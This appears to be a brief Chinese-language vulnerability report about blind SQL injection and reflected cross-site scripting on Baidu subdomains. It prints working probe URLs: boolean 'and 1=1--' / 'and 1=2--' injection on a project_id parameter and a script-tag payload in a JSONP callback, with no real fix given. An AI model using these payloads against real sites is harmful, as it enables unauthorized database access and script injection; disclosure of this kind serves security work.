http://test.baidu测试数据/index.php/crowdtest/bug/displayBugList/?sEcho=1&iColumns=6&sColumns=&iDisplayStart=0&iDisplayLength=20&iSortingCols=1&iSortCol_0=2&sSortDir_0=desc&bSortable_0=true&bSortable_1=true&bSortable_2=true&bSortable_3=true&bSortable_4=true&bSortable_5=false&bug_sub_available=1&project_id=690%20and%201=1-- test.baidu测试数据/index.php/crowdtest/bug/displayBugList/?sEcho=1&iColumns=6&sColumns=&iDisplayStart=0&iDisplayLength=20&iSortingCols=1&iSortCol_0=2&sSortDir_0=desc&bSortable_0=true&bSortable_1=true&bSortable_2=true&bSortable_3=true&bSortable_4=true&bSortable_5=false&bug_sub_available=1&project_id=690 and 1=2-- iTotalRecords 返回的数据判断 再加一个反射式跨站: http://house.baidu测试数据/callcenter/index.php?mod=website&act=newCalllist&num=20&jsoncallback=xxx%3Cscript%3Ealert%28/xx/%29%3C/script%3E 修复方案: 应该懂得吧!
查看更多关于百度某频道ROOT盲注及反射式跨站 - 网站安全 - 自的详细内容...